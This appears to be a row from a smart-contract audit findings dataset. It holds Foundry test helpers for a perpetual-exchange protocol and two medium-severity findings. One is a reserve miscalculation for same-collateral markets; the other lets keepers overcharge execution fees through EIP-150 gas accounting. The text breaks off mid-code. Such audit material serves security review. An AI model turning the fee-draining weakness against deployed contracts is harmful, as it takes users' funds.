12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(\"SIGNATURE\");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createWithdraw with withdrawor: \");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createDeposit with depositor: \");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(\"000000000000000000\");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(\"bbbbbbbbbbbbbbbbbbbbbb\");\\n }\\n else {\\n console2.log(\"111111111111111111111111\");\\n console2.log(\"deposit balance: %d, %d\", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(\"qqqqqqqqqqqqqqqqqq\");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(\"aaaaaaaaaaaaaaaaaaaaaaaaa\");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}(\"\");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(\"WNT balance of address(222) before cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) before cancelllation: %s\", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(\"WNT balance of address(222) after cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) after cancelllation: %s\", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(\"wnt suppports deposit?\");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(\"_wnt supports ERC165\");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(\"_sol supports ERC165\");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(\"abcdefg\"); // 973d02cb\\n // revert(\"abcdefg\"); // 0x08c379a, Error selector\\n // require(false, \"abcdefg\"); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(\"Error Message: \"); console2.logString(msg);\\n console2.log(\"error?\"); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(\"_orderVault:\"); console2.logAddress(address(_orderVault));\\n console2.log(\"marketToken:\"); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(\"\\n The summary of pool amounts: \");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n console2.log(\"Market: _marketProps1, token: long/nwt, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(\"Market: _marketProps1, token: short/USDC, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(\"Market: _marketPropsAB, token: long/A, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(\"Market: _marketPropsAB, token: short/B, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(\"Market: _marketPropsBC, token: long/B, amount:%d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(\"Market: _marketPropsBC, token: short/C, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(\"Market: _marketPropsCwnt, token: long/C, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(\"Market: _marketPropsCwnt, token: short/wnt, amount: %d\", amount);\\n \\n\\n console2.log(\"\\n\");\\n }\\n \\n}\\n```\\n -short side of getReservedUsd does not work for market that has the same collateral tokenчmediumчshort side of getReservedUsd does not work for market that has the same collateral token\\nConsider the case of ETH / USD market with both long and short collateral token as ETH.\\nthe available amount to be reserved (ETH) would CHANGE with the price of ETH.\\n```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\nчConsider apply both long and short calculations of reserveUsd with relation to the indexTokenPrice.чreservedUsd does not work when long and short collateral tokens are the same.ч```\\n function getReservedUsd(\\n DataStore dataStore,\\n Market.Props memory market,\\n MarketPrices memory prices,\\n bool isLong\\n ) internal view returns (uint256) {\\n uint256 reservedUsd;\\n if (isLong) {\\n // for longs calculate the reserved USD based on the open interest and current indexTokenPrice\\n // this works well for e.g. an ETH / USD market with long collateral token as WETH\\n // the available amount to be reserved would scale with the price of ETH\\n // this also works for e.g. a SOL / USD market with long collateral token as WETH\\n // if the price of SOL increases more than the price of ETH, additional amounts would be\\n // automatically reserved\\n uint256 openInterestInTokens = getOpenInterestInTokens(dataStore, market, isLong);\\n reservedUsd = openInterestInTokens * prices.indexTokenPrice.max;\\n } else {\\n // for shorts use the open interest as the reserved USD value\\n // this works well for e.g. an ETH / USD market with short collateral token as USDC\\n // the available amount to be reserved would not change with the price of ETH\\n reservedUsd = getOpenInterest(dataStore, market, isLong);\\n }\\n\\n return reservedUsd;\\n }\\n```\\n -Keepers can steal additional execution fee from usersчmediumчThe implementation of `payExecutionFee()` didn't take EIP-150 into consideration, a malicious keeper can exploit it to drain out all execution fee users have paid, regardless of the actual execution cost.\\nThe issue arises on `L55` of `payExecutionFee()`, as it's an `external` function, callingpayExecutionFee() is subject to EIP-150. Only `63/64` gas is passed to the `GasUtils` sub-contract(external library), and the remaing `1/64` gas is reserved in the caller contract which will be refunded to keeper(msg.sender) after the execution of the whole transaction. But calculation of `gasUsed` includes this portion of the cost as well.\\n```\\nFile: contracts\\gas\\GasUtils.sol\\n function payExecutionFee(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n StrictBank bank,\\n uint256 executionFee,\\n uint256 startingGas,\\n address keeper,\\n address user\\n ) external { // @audit external call is subject to EIP// Remove the line below\\n150\\n// Remove the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft();\\n// Add the line below\\n uint256 gasUsed = startingGas // Remove the line below\\n gasleft() * 64 / 63; // @audit the correct formula\\n uint256 executionFeeForKeeper = adjustGasUsage(dataStore, gasUsed) * tx.gasprice;\\n\\n if 